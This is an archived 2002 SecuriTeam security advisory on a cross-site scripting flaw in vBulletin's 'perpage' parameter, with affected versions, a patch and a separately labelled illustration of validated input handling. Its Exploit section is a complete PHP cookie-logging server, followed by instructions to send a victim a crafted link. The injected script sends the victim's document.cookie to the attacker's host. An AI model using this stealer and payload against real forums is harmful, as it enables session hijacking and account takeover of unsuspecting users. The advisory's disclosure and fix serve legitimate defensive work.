[UNIX] vBulletin XSS Injection Vulnerability (perpage)

From: support@securiteam.com
Date: 11/22/02

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 23 Nov 2002 00:31:14 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      vBulletin XSS Injection Vulnerability (perpage)
    ------------------------------------------------------------------------

    SUMMARY

    vBulletin is a powerful and widely used bulletin board system, written in
    PHP on top of a MySQL database. Sp.IC recently discovered a Cross-Site
    Scripting issue that allows attackers to inject malicious script into
    the pages and have it executed in the client's browser.

    DETAILS

    Vulnerable systems:
     * Jelsoft vBulletin 2.2.9 Release Candidate and prior

    Immune systems:
     * Jelsoft vBulletin 2.2.9 Final

    In the "Start View Threads" block of member2.php, the variable $perpage
    controls how subscribed threads are listed, so it should hold an integer
    (the number of threads displayed per page). However, the value of this
    variable is inserted into the query that fetches records from the
    database, and the script neither checks nor filters the input. If a
    client supplies an invalid value for $perpage, the script outputs an
    error message that prints the failing query, echoing the supplied value
    back into the page unescaped.

    Exploit:
     - Run this script on some host:
        <?PHP
          // vBulletin XSS Injection Vulnerability: Exploit
          // ---
          // Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
          // Description: Fetching vBulletin's cookies and storing it into a log file.

          // Variables:

          $LogFile = "Cookies.Log";

          // Functions:
          /*
          If ($HTTP_GET_VARS['Action'] = "Log") {
              $Header = "<!--";
              $Footer = "--->";
          }
          Else {
              $Header = "";
              $Footer = "";
          }
          Print ($Header);
          */
          Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
          Print ("<Pre>");
          Print ("<Center>");
          Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
          Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
          /*
          Print ($Footer);
          */

          Switch ($HTTP_GET_VARS['Action']) {
              Case "Log":
                  $Data = $HTTP_GET_VARS['Cookie'];
                  $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));
                  $Log = FOpen ($LogFile, "a+");
                  FWrite ($Log, Trim ($Data) . "\n");
                  FClose ($Log);
                  Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
              Break;
              Case "List":
                  If (!File_Exists ($LogFile) || !In_Array ($Records)) {
                      Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
                      Exit ();
                  }
                  Else {
                      Print ("</Center></Pre>");
                      $Records = Array_UniQue (File ($LogFile));
                      Print ("<Pre>");
                      Print ("<B>.:: Statics</B>\n");
                      Print ("\n");
                      Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
                      Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting Duplicates]\n");
                      Print ("\n");

                      Print ("<B>.:: Options</B>\n");
                      Print ("\n");

                      If (Count (File ($LogFile)) > 0) {
                          $Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";
                      }
                      Else {
                          $Link['Download'] = "[No Records in Log]";
                      }

                      Print ("o Download Log : " . $Link['Download'] . "\n");
                      Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH . "?Action=Delete\">Y</A>]\n");
                      Print ("\n");
                      Print ("<B>.:: Records</B>\n");
                      Print ("\n");

                      While (List ($Line[0], $Line[1]) = Each ($Records)) {
                          Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
                      }
                  }

                  Print ("</Pre>");
              Break;
              Case "Delete":
                  @UnLink ($LogFile);
                  Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
                  Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
              Break;
          }
        ?>

     - Give a victim this link:
    member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]

     - Note: You can replace [Script Code] with:
    --><Script>location='http://[Exploit Path]?Action=Log&Cookie='+(document.cookie);</Script>

     - Then go to http://[Exploit Path]?Action=List

    Solution:
     - Under [ // set defaults ] on line 304, paste this code:

            // Coerce $perpage to an integer so only a number can reach the query
            if (isset($perpage) && !is_int($perpage)) {
                $perpage = intval($perpage);
            }
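    As an added illustration (not vBulletin's code and not part of the advisory), the weak pattern described under DETAILS beside the hardened handling the Solution aims at; the function names, the table name and the default and maximum page sizes are assumptions:

```php
<?php
// Added example, not vBulletin's own code. Function names, the table name
// and the default/maximum page sizes are assumptions for illustration.

// Weak pattern from the advisory: the raw request value reaches the query
// unchecked, and a failing query is echoed back into the page unescaped.
function build_query_weak(string $perpage): string
{
    return "SELECT * FROM subscribethread LIMIT 0, $perpage";
}

function render_error_weak(string $query): string
{
    // Whatever was in $perpage is now part of the HTML response.
    return "<!-- Database error in query: $query -->";
}

// Hardened: only a bounded integer may reach the query, and any query
// text that is echoed in an error is HTML-escaped first.
function sanitize_perpage($raw, int $default = 20, int $max = 100): int
{
    $n = filter_var($raw, FILTER_VALIDATE_INT);
    if ($n === false || $n < 1) {
        return $default;   // non-numeric, negative or zero: fall back
    }
    return min($n, $max);  // cap so an oversized LIMIT cannot be requested
}

function build_query_safe($raw): string
{
    return "SELECT * FROM subscribethread LIMIT 0, " . sanitize_perpage($raw);
}

function render_error_safe(string $query): string
{
    // htmlspecialchars turns "-->" and "<script>" into inert text.
    return "<!-- Database error in query: "
        . htmlspecialchars($query, ENT_QUOTES, 'UTF-8') . " -->";
}

// Constructed input in the shape the advisory describes.
$payload = "--><script>alert(1)</script>";

// Weak path: the comment is closed and the script tag reaches the browser.
echo render_error_weak(build_query_weak($payload)), "\n";
// Hardened path: the payload is reduced to the default page size.
echo build_query_safe($payload), "\n";
// Hardened error output: the browser sees escaped text, not markup.
echo render_error_safe(build_query_weak($payload)), "\n";
```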

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:speedicnet@hotmail.com>
    Sp.IC and <mailto:scottmacvicar@ntlworld.com> Scott MacVicar.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.